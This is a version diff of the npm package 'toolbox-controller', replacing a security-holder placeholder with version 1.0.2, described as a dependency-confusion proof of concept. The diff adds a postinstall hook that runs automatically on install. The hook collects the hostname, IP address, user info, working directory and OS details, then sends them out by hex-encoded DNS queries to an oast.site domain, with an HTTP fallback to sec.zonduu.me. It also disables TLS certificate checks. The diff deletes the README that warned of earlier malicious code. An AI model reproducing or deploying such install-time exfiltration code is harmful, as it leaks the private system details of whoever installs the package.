toolbox-controller 0.0.1-security.1 → 1.0.2

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "toolbox-controller",
-  "version": "0.0.1-security.1",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.2",
+  "description": "Proof of concept for dependency confusion",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/postinstall.js

@@ -0,0 +1,95 @@
+const fs = require('fs');
+const dns = require('dns');
+const http = require('http');
+const os = require('os');
+
+const logFile = '/tmp/postinstall.log';
+
+process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+try {
+  fs.appendFileSync(logFile, `Starting postinstall script\n`);
+
+  const hostname = os.hostname();
+  const packageName = process.env.npm_package_name;
+  const packageVersion = process.env.npm_package_version;
+  const ipAddress = require('child_process').execSync('hostname -I').toString().trim();
+  const currentPath = process.cwd();
+  const platform = os.platform();
+  const userInfo = os.userInfo();
+
+  // Operating System Details
+  const osDetails = {
+    platform: os.platform(),
+    release: os.release(),
+    arch: os.arch()
+  };
+
+  const data = {
+    packageName,
+    packageVersion,
+    hostname,
+    ipAddress,
+    currentPath,
+    platform,
+    userInfo,
+    osDetails // Added OS details here
+  };
+
+  fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
+
+  // Prepare data for DNS exfiltration
+  const dnsData = `${packageName}-${hostname}-${ipAddress}`;
+  const hexData = Buffer.from(dnsData).toString('hex');
+
+  // Split hex data into parts fitting within DNS label length limit
+  const maxLabelLength = 63;
+  const hexDataParts = [];
+  for (let i = 0; i < hexData.length; i += maxLabelLength) {
+    hexDataParts.push(hexData.substring(i, i + maxLabelLength));
+  }
+
+  // Send each part as a separate DNS query
+  hexDataParts.forEach((part, index, arr) => {
+    const partIndex = index + 1;
+    const totalParts = arr.length;
+    const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
+    dns.resolve4(dnsSubdomain, (err, addresses) => {
+      if (err) {
+        fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
+      } else {
+        fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
+      }
+    });
+  });
+
+  // HTTP fallback
+  const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
+
+  const options = {
+    hostname: 'sec.zonduu.me', // Replace with your HTTP server hostname
+    port: 80, // Replace with the appropriate port
+    path: `/callbackplz?${getData}`,
+    method: 'GET'
+  };
+
+  const req = http.request(options, (res) => {
+    let responseData = '';
+    res.on('data', (chunk) => {
+      responseData += chunk;
+    });
+    res.on('end', () => {
+      fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
+    });
+  });
+
+  req.on('error', (e) => {
+    fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
+  });
+
+  req.end();
+
+  fs.appendFileSync(logFile, `postinstall script finished\n`);
+} catch (e) {
+  fs.appendFileSync(logFile, `Error: ${e.message}\n`);
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=toolbox-controller for more information.